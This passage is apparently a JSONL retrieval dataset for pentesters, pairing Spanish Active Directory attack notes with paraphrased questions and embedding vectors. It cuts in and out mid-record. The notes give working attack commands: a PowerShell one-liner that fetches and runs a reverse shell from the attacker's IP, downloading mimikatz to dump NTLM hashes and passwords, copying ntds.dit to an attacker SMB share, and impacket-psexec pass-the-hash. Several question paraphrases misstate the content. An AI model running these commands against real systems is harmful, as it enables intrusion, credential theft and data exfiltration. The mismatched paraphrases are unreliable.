Invoke-ConPtyShell TU_IP 4444\n```\n\nTu Terminal 1 te da una shell **interactiva** Windows.", "indexar": "cual es la tecnica para ejecutar comandos a travΓ©s de un archivo subido o inyecciΓ³n SQL?", "v": [0.17156, -0.06776, -0.08323, -0.07994, 0.05721, -0.23075, 0.00856, -0.11385, -8e-05, 0.06964, -0.1562, -0.0192, 0.0496, -0.05333, -0.04491, 0.0247, 0.1665, -0.08587, 0.00185, -0.02602, 0.11861, -0.03254, 0.03981, -0.05408, -0.04881, -0.00832, 0.03109, 0.09184, -0.12955, -0.1535, -0.08009, 0.07488, 0.06809, 0.00502, 0.0294, 0.06183, -0.05752, 0.05419, -0.1103, 0.07712, -0.11997, -0.00777, -0.24191, -0.00621, 0.03609, -0.0939, 0.15675, 0.04019, 0.04749, -0.08553, 0.03185, 0.02284, -0.09689, -0.10873, -0.13589, -0.08358, 0.11605, -0.07287, -0.0077, 0.05475, -0.01112, -0.08177, 0.07581, 0.05587, -0.05007, -0.05859, -0.04438, -0.10561, -0.00287, 0.08117, -0.09932, 0.08521, -0.04714, 0.0512, 0.03281, -0.04278, -0.03834, -0.02055, 0.02026, -0.03895, -0.10507, -0.01831, -0.10271, 0.07398, -0.05626, -0.08055, 0.03191, -0.03231, -0.00345, -0.06385, 0.10213, -0.08649, 0.02488, 0.01885, 0.06669, -0.00159, -4e-05, -0.04437, 0.00057, 0.03434, -0.00741, -0.06147, -0.08255, 0.16399, 0.12143, 0.12641, 0.01815, -0.05926, 0.01434, -0.01937, 0.02994, 0.00581, 0.02456, -0.00079, -0.00667, -0.01535, -0.00974, -0.02221, -0.03664, -0.04248, -0.08098, 0.02532, 0.0229, 0.06368, -0.05546, -0.10616, -0.06324, 0.01548, -0.01773, 0.00791, -0.05829, 0.04249, 0.01149, -0.03879, -0.08496, 0.11043, 0.0703, -0.05561, -0.09664, -0.11114, 0.04589, 0.02699, -0.00171, 0.045, 0.06663, -0.00199, 0.00118, -0.05485, -0.07912, -0.03745, 0.06503, 0.01718, -0.00254, 0.03096, -0.0202, -0.04934, 0.02728, -0.08812, -0.06625, 0.08544, 0.02763, 0.05426, -0.03089, 0.00898, -0.02122, -0.05129, -0.04695, -0.04013, -0.03653, -0.01789, 0.02706, -0.00594, -0.0331, -0.05347, 0.0239, -0.03014, -0.07072, -0.0584, 0.06991, -0.02456, -0.02041, 0.0217, 0.00969, 0.00958, -0.02336, -0.06227, -0.00871, 0.01004, 0.00761, -0.00754, -0.02519, 0.02481, -0.04539, -0.04391, 0.01269, -0.02736, -0.01634, 0.00327, -0.00897, -0.01683, -0.05058, -0.02699, -0.0479, -0.06691, -0.00267, 0.00445, -0.02587, 0.02377, -0.07002, -0.01792, 0.00691, 0.00237, 0.05277, 0.00807, 0.00085, -0.05096, 0.00769, 0.01508, 0.00256, -0.03522, -0.02636, 0.01007, 0.12216, -0.07636, -0.01613, -0.04633, -0.00041, -0.01639, -0.01088, 0.00867, -0.00491, 0.0462, -0.00289, 0.00316, 0.08737, 0.04559, 0.00364, 0.02411, -0.03555, -0.07381, 0.04224, 0.08701, -0.02968, -0.02461, -0.00736, -0.0167, -0.11633, 0.01682, -0.03376, -0.07133, 0.00359, 0.00747, 0.02126, -0.02381, 0.01014, -0.06737]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### B) Recibes una reverse shell\n\nTienes RCE en la vΓ­ctima (por ejemplo SQLi β†’ xp_cmdshell, o file upload). Le metes:\n\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\n\nTu Terminal 1 te da una shell **interactiva** Windows.", "indexar": "como montar una conexiΓ³n shell interactiva con tu propia IP en el cliente objetivo?", "v": [0.04767, 0.05793, -0.23194, -0.12866, 0.0018, -0.16481, -0.09165, -0.00115, -0.09291, -0.05721, 0.03271, 0.01213, 0.04679, -0.09081, 0.01359, 0.06319, 0.01909, -0.10043, 0.05604, -0.1056, -0.04965, 0.15663, -0.15138, -0.06752, -0.10641, 0.05965, -0.02946, 0.05285, -0.01694, -0.03485, -0.0841, -0.1016, 0.00936, 0.05445, -0.10202, -0.25563, -0.00797, 0.0728, 0.05643, -0.02934, -0.01591, -0.03245, -0.10745, 0.10389, 0.14546, 0.09195, 0.10321, -0.13451, -0.02417, 0.08797, -0.08242, -0.01968, -0.10094, 0.01049, -0.03221, -0.04002, 0.12432, -0.11008, 0.08836, -0.05887, -0.07217, 0.09027, -0.04576, 0.06695, 0.12161, -0.07853, -0.1075, -0.04858, -0.04562, -0.02134, 0.05707, -0.04737, -0.04946, 0.02063, 0.10003, 0.04811, 0.08808, -0.06496, 0.09395, -0.01642, -0.003, -0.03077, -0.03384, 0.05419, -0.08308, -0.01708, 0.06278, -0.16274, -4e-05, -0.04466, 0.08242, 0.05054, 0.03098, -0.00726, -0.09324, -0.10682, 0.03817, -0.01025, 0.01303, -0.00444, -0.09973, 0.05338, -0.10828, 0.12478, 0.11601, -0.04967, 0.04966, 0.01656, 0.04976, 0.05514, -0.01912, 0.00039, -0.00341, -0.05896, -0.0391, -0.09242, -0.02434, -0.01826, 0.0001, -0.04399, -0.05913, 0.00702, 0.0778, 0.03465, -0.05168, 0.05344, -0.04293, 0.10589, -0.00178, -0.0285, -0.03442, 0.02338, -0.00128, -0.05029, 0.01562, 0.03958, -0.03719, -0.10438, -0.01172, 0.00401, 0.02378, -0.07305, -0.02733, -0.06383, 0.04518, -0.0321, 0.04413, -0.04359, -0.03714, 0.06051, -0.03978, 0.03538, -0.00111, -0.01687, -0.05625, 0.03684, 0.04101, -0.02652, 0.06291, 0.05437, -0.00694, -0.04749, 0.02485, 0.04113, 0.02904, -0.04826, -0.17449, -0.01713, 0.1159, -0.01551, -0.04522, 0.01498, 0.01587, -0.00911, 0.01714, 0.01694, -0.03356, 0.01117, 0.03313, -0.05924, 0.00707, -0.05007, 0.00322, -0.03134, -0.02732, -0.03793, 0.04186, 0.00481, -0.00955, 0.02177, 0.02079, -0.02408, -0.02574, 0.05442, 0.05879, -0.09767, -0.02053, 0.00885, -0.00672, 0.02832, -0.00296, -0.02715, 0.03618, 0.01172, 0.00609, 0.03238, -0.02158, 0.04574, 0.01748, 0.02153, 0.04344, -0.02518, 0.11976, -0.0264, 0.01875, 0.04078, 0.02869, -0.01259, -0.01156, 0.07981, 0.02482, 0.05362, 0.02599, -0.00712, -0.01895, 0.02178, -0.00011, 0.01393, 0.01893, -0.01741, -0.05546, -0.0207, 0.00655, -0.02206, 0.0397, -0.01246, 0.05582, -0.00402, -0.00919, -0.04331, 0.00441, 0.0573, -0.02023, -0.02029, 0.03197, -0.03799, -0.02951, 0.0691, -0.00929, -0.0478, -0.07287, -0.02255, 0.00449, 0.01222, -0.0361, -0.02398]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Dentro de la shell, en la vΓ­ctima:\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe\nC:\\Windows\\Temp\\m.exe\n```\n\nY dentro de mimikatz:\n\n```\nprivilege::debug\nsekurlsa::logonpasswords\n```\n\nTe aparecen hashes NTLM, Kerberos tickets en memoria, a veces hasta contraseΓ±as en claro (wdigest).", "indexar": "con que programa puedo extraer las contraseΓ±as y tokens de los usuarios desde la memoria del sistema?", "v": [0.12306, 0.0546, -0.09273, -0.17744, 0.00628, -0.06355, -0.02378, -0.03563, -0.09161, -0.09716, -0.13063, 0.04967, 0.05335, -0.08523, 0.05212, -0.00933, 0.15723, -0.04948, 0.14718, 0.0793, -0.01604, -0.10143, -0.0603, 0.03475, -0.00577, 0.0662, 0.00017, -0.05058, -0.04317, 0.08088, 0.00127, -0.0961, 0.08286, -0.07381, -0.01535, 0.08977, 0.07954, 0.13028, 0.05706, 0.07358, 0.11285, 0.04619, -0.09344, 0.00053, 0.0654, 0.0077, 0.01009, 0.06255, 0.1177, -0.12572, -0.06901, -0.06312, -0.04849, -0.06486, 0.04968, -0.14897, 0.05943, -0.04006, -0.03123, 0.00845, -0.07623, 0.08212, 0.05796, 0.01934, 0.03678, -0.01995, 0.07521, 0.02678, -0.14814, 0.20878, -0.02788, -0.00803, 0.03748, 0.03267, 0.05748, 0.05181, 0.03749, -0.0555, 0.03874, 0.06117, -0.14806, -0.08058, 0.01787, -0.00047, -0.03934, 0.04602, 0.04386, -0.00082, 0.0172, -0.04409, 0.07019, 0.02554, 0.07811, 0.15356, 0.11335, -0.06096, 0.06186, 0.08051, -0.03123, -0.00361, 0.0141, 0.01609, -0.05451, 0.21914, 0.04476, 0.03555, 0.05432, 0.01362, -0.01168, -0.08316, -0.01781, -0.03329, -0.02184, -0.06647, -0.08346, 0.03741, 0.01453, -0.00771, 0.0722, -0.01361, -0.03465, -0.06307, -0.0022, -0.01462, 0.12845, 0.02558, -0.0326, 0.06328, -0.06764, -0.03002, 0.03015, 0.10979, -0.03337, -0.02704, -0.02608, 0.01467, -0.00197, 0.01625, -0.02088, 0.02139, 0.01398, 0.05894, -0.00036, -0.03065, 0.04898, 0.0309, 0.04807, -0.01293, -0.04189, -0.0232, -0.00576, 0.02566, 0.00283, -0.00085, -0.06554, 0.01116, -0.00727, -0.07829, -0.13397, 0.05176, -0.09706, -0.03722, 0.00478, -0.02439, -0.0354, -0.03664, -0.04824, 0.05286, 0.09275, 0.06636, 0.01662, 0.03553, 0.06103, -0.07376, 0.02799, -0.00951, -0.0403, -0.11181, 0.02749, -0.05593, -0.09768, -0.02681, 0.0325, 0.01435, -0.01798, -0.08742, 0.03532, 0.06065, 0.02735, -0.00296, 0.03627, 0.0422, 0.02399, 0.06096, 0.00543, -0.05044, -0.02859, -0.01207, 0.0341, -0.0276, -0.02798, 0.10442, 0.01295, -0.02418, -0.01983, 0.11726, -0.0006, -0.0258, 0.05045, 0.02423, 0.04844, -0.01881, 0.02137, -0.02898, -0.10429, -0.04585, -0.0164, 0.03275, -0.01076, -0.09197, 0.01901, 0.04661, 0.07145, 0.08914, -0.05413, -0.09177, -0.01774, 0.09192, -0.00047, -0.02616, -0.02731, -0.02745, -0.01606, -0.01799, 0.07003, -0.00837, -0.07975, -0.04142, -0.04088, -0.05472, -0.03971, 0.0677, -0.00754, -0.05347, -0.08141, -0.02838, -0.0367, 0.012, 0.0334, -0.0415, -0.04133, 0.04836, 0.05073, -0.02405, -0.01814, 0.00377]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Dentro de la shell, en la vΓ­ctima:\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe\nC:\\Windows\\Temp\\m.exe\n```\n\nY dentro de mimikatz:\n\n```\nprivilege::debug\nsekurlsa::logonpasswords\n```\n\nTe aparecen hashes NTLM, Kerberos tickets en memoria, a veces hasta contraseΓ±as en claro (wdigest).", "indexar": "cual es una herramienta para obtener hashes NTLM y Kerberos directamente en el equipo objetivo?", "v": [-0.13892, -0.08517, -0.03106, -0.08755, 0.04827, -0.1685, -0.16383, 0.165, -0.0063, -0.0081, -0.16416, 0.05685, 0.01573, -0.02359, 0.11637, 0.16978, -0.0088, -0.12118, 0.00081, 0.05986, -0.02124, 0.02372, -0.16331, -0.04095, -0.0707, -0.03612, -0.0017, 0.03571, -0.21039, 0.09177, -0.05282, 0.02089, -0.05828, -0.00149, 0.0491, -0.09877, -0.04157, 0.12705, 0.01084, 0.12438, -0.00916, 0.10421, -0.06197, 0.08617, 0.13246, -0.04344, 0.00057, 0.01519, 0.09704, -0.12702, 0.02706, 0.02748, -0.15409, -0.12576, -0.06661, -0.17311, 0.17174, -0.09381, -0.02727, -0.09903, -0.09658, -0.10834, -0.07072, -0.09853, -0.02743, -0.11164, -0.00768, -0.08549, -0.08185, -0.01954, -0.06583, 0.07167, 0.11503, -0.07006, 0.01028, 0.05332, 0.01191, 0.05798, 0.06301, -0.01923, 0.12092, -0.05401, -0.06582, 0.02638, -0.08386, -0.13171, 0.12989, 0.03505, -0.01052, -0.05705, -0.02415, 0.028, -0.04734, -0.04619, -0.01262, -0.06593, 0.01905, -0.04145, 0.01216, -0.00873, 0.03543, -0.10754, -0.07409, 0.09343, -0.06339, -0.01863, -0.00355, 0.06216, -0.04288, 0.04242, 0.11213, -0.04021, -0.00667, 0.05866, 0.03086, 0.05053, -0.01662, 0.00794, -0.0071, -0.04271, -0.05131, 0.05522, -0.0363, -0.01338, -0.01488, -0.04146, -0.02166, 0.04918, -0.05737, -0.04659, 0.02542, 0.01898, -0.06585, 0.04073, -0.06887, 0.00207, -0.01538, -0.08767, -0.0133, -0.02235, 0.03268, 0.04335, -0.0199, -0.08098, 0.04713, -0.03398, -0.0138, -0.06178, 0.02096, -0.01249, 0.04485, -0.01866, -0.01805, -0.00182, -0.02383, 0.0439, -0.01262, 0.01574, -0.12257, 0.02678, -0.04523, -0.07131, 0.04125, 0.02689, 0.04117, -0.06367, 0.03322, -0.02809, 0.0753, 0.02517, -0.00521, -0.03625, 0.03106, -0.01557, 0.01588, -0.01826, 0.05271, -0.0007, -0.01848, -0.0947, 0.01425, 0.03099, 0.01271, -0.02507, 0.02179, -0.02796, 0.05277, 0.03873, -0.0321, 0.01101, -0.00351, 0.02694, -0.00409, -0.07926, 0.02799, 0.00843, -0.01485, -0.04379, 0.05869, -0.00948, -0.06529, 0.00843, 0.05312, -0.00579, 0.02448, 0.05548, -0.03372, -0.04318, -0.07752, 0.03728, 0.06822, 0.00987, 0.05784, -0.02823, -0.03733, -0.00276, 0.02227, -0.02862, -0.01223, 0.05889, 0.01139, 0.04012, 0.08812, -0.02392, -5e-05, -0.00286, 0.00812, 0.06327, -0.03499, -0.04388, -0.01833, -0.02368, -6e-05, 0.01258, 0.02674, 0.01147, 0.02387, 0.04285, -0.03097, -0.04127, 0.04077, 0.04692, 0.01202, 0.00639, -0.00844, -0.02807, -0.01294, 0.01133, -0.02404, -0.03264, -0.00872, 0.00972, 0.02937, -0.03257, -0.00612, -0.04237]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Dentro de la shell, en la vΓ­ctima:\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe\nC:\\Windows\\Temp\\m.exe\n```\n\nY dentro de mimikatz:\n\n```\nprivilege::debug\nsekurlsa::logonpasswords\n```\n\nTe aparecen hashes NTLM, Kerberos tickets en memoria, a veces hasta contraseΓ±as en claro (wdigest).", "indexar": "que tecnica sirve para leer credenciales en memoria sin necesidad de acceso administrativo?", "v": [-0.11609, 0.04562, -0.15376, -0.22792, 0.08711, -0.0834, -0.02679, 0.03949, -0.08938, 0.00345, -0.07528, 0.08909, 0.00609, -0.06522, 0.13994, 0.01049, 0.14074, -0.05455, 0.08958, 0.03207, -0.02016, -0.04116, -0.05179, 0.1353, -0.03416, 0.01193, 0.046, -0.08658, 0.00686, -0.00148, 0.01701, 0.16897, 0.09253, -0.05065, 0.03673, 0.11438, -0.09406, -0.00148, -0.09319, 0.19668, -0.03205, 0.0596, -0.01803, 0.08968, 0.12705, -0.05494, 0.09015, 0.08257, -0.07436, -0.02067, -0.05249, 0.01333, 0.03812, -0.10918, 0.01669, 0.08129, 0.04339, -0.06962, 0.0053, -0.10449, -0.1221, 0.01501, 0.04471, 0.02183, 0.10996, -0.01475, 0.07139, -0.00974, -0.03756, 0.05571, -0.21157, -0.03882, -0.00359, -0.03282, -0.09844, -0.00613, -0.00926, 0.10897, 0.10362, 0.02927, 0.01199, -0.02013, -0.1033, -0.08395, 0.0508, -0.02359, 0.03624, 0.01882, 0.06656, -0.02028, 0.052, 0.16258, -0.05666, 0.02615, 0.08228, 0.02466, -0.08991, 0.0477, 0.04266, 0.10793, 0.02439, -0.07489, -0.05584, 0.08552, 0.01531, 0.06535, 0.03335, -0.03865, 0.00374, -0.07664, 0.0378, 0.00386, -0.1088, 0.06305, -0.04523, 0.02789, 0.06707, 0.00286, -0.04116, -0.00745, 0.06555, -0.11208, 0.02275, -0.05298, -0.03211, -0.00353, -0.03174, -0.03039, 0.01622, -0.00357, -0.00986, 0.01596, -0.03032, -0.04493, 0.01894, -0.01124, -0.02213, 0.02185, -0.05106, 0.0091, 0.01778, 0.05144, -0.1021, -0.0767, -0.10669, 0.02488, 0.10342, -0.01596, 0.02024, -0.06687, 0.02057, -0.00854, 0.03633, 0.07726, -0.02308, -0.04686, 0.08435, -0.10156, -0.09017, 0.04162, -0.09664, 0.02952, 0.01773, 0.03586, -0.02762, -0.10094, -0.09519, 0.01778, 0.08121, 0.06255, -0.02882, -0.0902, -0.07262, -0.00799, 0.00152, -0.03988, -0.09316, -0.01934, -0.00519, -0.05232, -0.06151, -0.07543, -0.02887, 0.02897, -0.01836, -0.08685, -0.01443, -0.01807, 0.0207, -0.033, 0.0418, -0.0612, 0.02758, 0.00787, 0.0231, -0.05321, -0.03515, 0.01334, 0.04628, 0.01104, -0.01663, 0.05822, -0.0472, 0.01799, 0.0294, 0.09632, 0.04359, 0.03876, -0.04771, 0.00847, 0.00788, -0.04469, 0.02434, -0.03596, -0.04686, -0.07271, 0.02034, 0.00431, -0.01975, -0.011, 0.06961, -0.01442, 0.03006, 0.01528, -0.0058, -0.03398, 0.02713, 0.03671, -0.02418, -0.00218, -0.05016, 0.08306, -0.02202, 0.02356, 0.07006, -0.01334, -0.05013, -0.03308, -0.0265, -0.0228, -0.00431, 0.01704, -0.05242, -0.00685, -0.0683, -0.06071, -0.04266, 0.04357, 0.00743, -0.06658, -0.01259, 0.00334, 0.02864, 0.00522, 0.03121, -0.02321]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### D) Exfiltras un fichero grande (NTDS.dit, etc.)\n\nDesde la vΓ­ctima:\n\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\loot\\\n```\n\nAparece en `/tmp/loot/` en tu Kali. **Esto sustituye al wget**, porque SMB cifra y atraviesa muchos firewalls.", "indexar": "que programa sirve para descargar un fichero grande usando SMB sin cifrado?", "v": [-0.05398, -0.04425, -0.19764, -0.12744, 0.0984, -0.18324, -0.16326, -0.14046, -0.10341, -0.09347, -0.00082, -0.01256, -0.03363, -0.18824, -0.01463, -0.06262, -0.01498, -0.1575, 0.03944, -0.01823, 0.14101, 0.04031, 0.03389, -0.15359, -0.05701, -0.00238, 0.03235, -0.00765, -0.08485, -0.04544, 0.188, 0.0118, 0.16765, -0.06647, 0.03456, 0.01981, 0.0214, -0.08296, -0.04562, 0.03887, 0.13135, 0.0158, -0.04987, -0.01006, 0.03193, -0.07801, 0.06357, 0.05964, 0.06951, 0.06424, 0.04911, -0.0506, -0.01667, -0.0009, -0.0854, -0.13503, 0.06608, -0.13107, -0.04344, 0.02634, -0.04708, 0.0295, 0.1246, -0.01276, 0.07084, -0.07714, 0.04403, 0.09178, -0.06008, -0.09037, -0.0628, 0.1675, 0.02663, 0.01639, -0.04045, 0.02816, -0.03048, -0.08167, 0.00602, -0.03456, -0.04293, -0.11906, -0.01138, 0.03973, -0.10565, -0.01081, 0.07936, 0.05743, 0.05083, -0.06018, 0.04296, 0.09009, 0.03068, 0.0829, 0.03762, -0.03689, 0.08996, 0.04277, 0.09682, 0.09247, 0.05624, -0.00222, -0.06435, 0.02862, -0.0144, 0.13833, 0.05196, -0.05235, -0.0159, 0.06633, 1e-05, 0.03137, 0.03534, -0.02705, -0.07187, -0.02742, 0.08992, -0.06004, 0.00081, -0.11562, -0.09023, 0.06767, -0.0599, 0.01603, 0.00584, -0.03446, 0.00978, 0.0607, -0.06746, 0.03611, 0.00025, -0.01691, -0.07117, 0.02004, -0.08847, -0.1078, 0.01067, -0.03061, -0.02944, -0.02681, 0.04585, 0.07312, -0.07988, 0.03248, -0.01741, -0.00056, 0.04601, -0.00694, -0.01894, -0.02291, 0.08837, 0.03231, -0.00951, 0.04648, -0.01864, -0.0306, 0.04619, -0.05185, -0.05947, 0.01024, 0.01285, -0.02034, 0.02992, 0.00669, 0.007, -0.00295, 0.00748, 0.00656, 0.09528, 0.11163, -0.05536, 0.0169, 0.04685, -0.11077, 0.02073, -0.0526, 0.02205, -0.01839, 0.0156, -0.00691, -0.06424, 0.0169, 0.06933, 0.02063, -0.06529, -0.01167, -0.02114, -0.02464, -0.02438, -0.01733, -0.01426, 0.08712, -0.02699, -0.01499, 0.00439, -0.02191, -0.04773, 0.02396, 0.05398, -0.01679, -0.09226, 0.00633, -0.06378, -0.01594, 0.0786, 0.04876, -0.01241, -0.00276, -0.00022, 0.01971, -0.00016, 0.00796, 0.01629, -0.03201, -0.00729, -0.01294, 0.02266, 0.06374, 0.11898, 0.02032, -0.06474, 0.02052, 0.05045, -0.00017, -0.02692, -0.0136, 0.04005, -0.0176, 0.01906, 0.04471, -0.02971, 0.00623, 0.05312, 0.00098, 0.05156, -0.02119, -0.04145, 0.02974, -0.01681, -0.06065, -0.04931, 0.05409, -0.02152, -0.02642, 0.00332, 0.01332, -0.02646, -0.02686, 0.07931, -0.01081, -0.04853, 0.0428, 0.04612, 0.02214, 0.01153, 0.04674]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### D) Exfiltras un fichero grande (NTDS.dit, etc.)\n\nDesde la vΓ­ctima:\n\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\loot\\\n```\n\nAparece en `/tmp/loot/` en tu Kali. **Esto sustituye al wget**, porque SMB cifra y atraviesa muchos firewalls.", "indexar": "con que puedo montar un servidor temporal para exfiltrar datos desde la vΓ­ctima?", "v": [-0.12875, 0.02866, -0.15158, -0.16566, -0.18645, 0.01232, 0.03138, -0.01316, 0.04918, 0.05504, 0.02411, -0.01104, 0.15477, 0.01761, -0.01057, 0.0831, 0.14251, -0.14801, 0.06963, -0.01101, -0.00488, -0.01764, 0.11964, -0.09423, -0.08138, 0.06764, -0.04654, -0.08226, -0.14987, -0.01286, 0.03794, -0.03278, 0.01366, 0.03443, 0.09172, 0.00244, -0.0228, 0.10048, -0.02496, -0.00548, 0.12559, -0.00523, -0.10837, 0.00065, 0.0454, -0.02747, -0.13623, -0.03034, 0.07679, 0.03055, 0.00751, -0.00862, -0.17448, -0.05445, -0.09563, -0.02027, 0.11135, -0.14558, 0.18854, 0.00193, -0.06037, 0.05676, -0.05057, 0.10032, 0.07135, -0.05077, 0.05686, 0.06484, -0.0962, -0.02581, -0.03942, -0.04434, 0.02704, -0.1014, 0.03198, -0.06235, 0.04675, -0.0008, 0.02341, 0.07039, -0.04137, 0.03899, -0.03997, 0.14947, -0.03562, 0.07251, 0.07253, -0.0791, 0.01134, -0.03998, 0.1053, 0.06392, -0.00874, 0.05928, 0.05923, -0.08444, 0.05713, -0.05225, -0.03581, -0.02826, 0.07203, 0.02834, 0.01214, 0.10632, 0.11809, -0.01335, 0.03415, 0.06678, -0.04488, -0.07152, -0.02394, 0.00165, -0.09302, -0.06622, -0.02588, -0.11642, 0.03091, 0.00873, 0.0534, 0.10435, 0.03462, 0.0103, 0.09117, 0.05131, -0.01339, -0.05625, 0.09172, -0.03657, -0.00834, -0.0477, -0.02261, 0.04484, 0.01927, -0.01794, 0.01767, 0.0868, 0.04249, -0.03398, -0.04468, -0.08852, 0.01494, 0.0004, -0.06942, 0.05029, 0.00638, -0.04265, 0.06597, -0.00496, -0.02768, -0.04175, 0.11839, 0.02256, -0.016, 0.05154, -0.16973, -0.02126, -0.00875, -0.04249, -0.02334, 0.01626, 0.05126, 0.05381, -0.02837, 0.07899, 0.0198, -0.07947, 0.03194, 0.00237, 0.13617, 0.04472, 0.03046, 0.00181, 0.01579, -0.03295, 0.03646, -0.02419, -0.0527, -0.09002, -0.0309, 0.02274, 0.02872, 0.00247, -0.00694, -0.01571, -0.05466, -0.07236, 0.024, -0.03657, -0.01718, 0.00856, 0.00069, 0.03934, 0.02028, 0.06375, 0.06324, -0.11633, -0.04042, 0.04965, 0.00648, -0.00435, -0.08283, 0.03859, -0.02254, -0.04145, 0.01773, 0.02868, -0.03299, 0.005, 0.05941, -0.01481, -0.03698, -0.00072, 0.05008, -0.06356, -0.00965, -0.00103, 0.10026, -0.04652, -0.04318, 0.00863, -0.06768, 0.02352, 0.06722, 0.00833, -0.03233, 0.04246, 0.02822, 0.0434, 0.04645, -0.03235, -0.02955, 0.01171, -0.02231, -0.05645, 0.0312, -0.01663, -0.00623, -0.03006, -0.02513, -0.0309, 0.01305, 0.05119, -0.01998, -0.03312, -0.0241, -0.01284, -0.03723, 0.0398, -0.00266, -0.07341, -0.04654, -0.02317, 0.01063, -0.08785, -0.02576, -0.07414]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### D) Exfiltras un fichero grande (NTDS.dit, etc.)\n\nDesde la vΓ­ctima:\n\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\loot\\\n```\n\nAparece en `/tmp/loot/` en tu Kali. **Esto sustituye al wget**, porque SMB cifra y atraviesa muchos firewalls.", "indexar": "cual es una alternativa a wget si necesito copiar archivos grandes por red local", "v": [0.07486, 0.03261, -0.03156, -0.03615, 0.00668, -0.15133, 0.01044, 0.02047, -0.1051, -0.13342, -0.10086, -0.24469, -0.02777, 0.01145, 0.13524, -0.02229, 0.02674, 0.01544, 0.17369, -0.00196, -0.05852, -0.02229, -0.04687, -0.06405, 0.07975, -0.00301, 0.07236, 0.07915, -0.08611, 0.1139, -0.03752, 0.01999, 0.04977, -0.0383, -0.18245, 0.12424, 0.15332, 0.04582, -0.09393, -0.08658, 0.02672, 0.12902, -0.17147, 0.13977, -0.052, -0.08833, -0.05256, -0.06188, -0.10655, 0.03689, -0.01091, -0.03981, -0.08904, -0.01641, -0.00897, 0.00829, 0.11746, -0.10599, -0.08788, 0.05034, -0.11206, 0.00674, -0.03827, 0.05053, 0.01844, 0.02836, -0.1025, 0.02084, -0.11851, 0.0285, -0.0447, 0.10764, 0.0617, -0.01015, -0.06635, 0.02631, 0.00835, -0.12812, -0.04058, -0.01217, 0.08357, 0.02611, 0.07525, -0.01881, -0.01302, -0.11802, 0.04335, -0.00084, 0.00701, 0.0066, 0.05274, -0.09161, 0.07296, 0.02261, -0.00403, -0.09948, 0.03028, 0.0289, -0.04793, 0.02039, -0.04578, -0.01707, -0.0536, 0.03657, 0.06383, 0.0171, -0.03196, 0.05499, 0.00768, -0.02458, 0.08073, 0.0343, 0.07174, 0.078, -0.01465, -0.0771, 0.00564, 0.0057, -0.02124, 0.00204, -0.03878, 0.03371, -0.06087, -0.13703, -0.02548, -0.02973, 0.06245, 0.02807, -0.07626, 0.02822, 0.06243, 0.02342, 0.03619, -0.07805, -0.06618, -0.03289, 0.03338, -0.05103, -0.01582, -0.07145, -0.01509, -0.02326, -0.08068, -0.05768, -0.00209, 0.08177, 0.05369, -0.02015, -0.02066, -0.06248, -0.08193, -0.03138, -0.05296, 0.00718, -0.04202, 0.07627, -0.00346, -0.09244, -0.03614, 0.07769, 0.01213, -0.02047, -0.03769, -0.0237, -0.06669, -0.13119, 0.04198, 0.03801, 0.03486, -0.07065, 0.01764, 0.04864, -0.12615, -0.07874, 0.01993, -0.05137, 0.04519, -0.07988, 0.0382, -0.04926, 0.0658, 0.05476, -0.03111, 0.13483, 0.05081, -0.03938, 0.04371, 0.0552, -0.06842, 0.02243, -0.03526, -0.07539, -0.01389, -0.01065, -0.01072, 0.01671, 0.05264, -0.0337, 0.00893, -0.01321, -0.02801, -0.00162, -0.12523, 0.00296, 0.01344, -0.00906, -0.04722, 0.06845, -0.0163, 0.02383, -0.02479, 0.0317, 0.04543, 0.03788, 0.00551, -0.03803, -0.02347, 0.01922, 0.06211, -0.01018, 0.04529, -0.00716, 0.01849, 0.08266, -0.03431, 0.00388, 0.02638, -0.01976, -0.04956, 0.02486, 0.01137, 0.03363, -0.00813, 0.07617, 0.00582, -0.03354, -0.00554, 0.04267, -0.01199, -0.03524, 0.02059, 0.06255, -0.0145, 0.02018, -0.03488, -0.00398, -0.07734, -0.00373, 0.02417, -0.06581, 0.03656, 0.06906, 0.02918, 0.02832, 0.06943, 0.05738]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### E) Lateral movement con Impacket (sin reverse shell nueva)\n\nUna vez tienes hash de un user privilegiado:\n\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\n\nTe da shell SYSTEM en otra mΓ‘quina, **sin necesidad de meter ninguna reverse shell**. Por encima de la red, autenticado, limpio.", "indexar": "que herramienta sirve para mover lateralmente sin montar una reverse shell?", "v": [0.05435, -0.02027, -0.22838, -0.17988, -0.22555, -0.06505, -0.17142, 0.0822, -0.01599, -0.08693, -0.11565, -0.04192, 0.169, 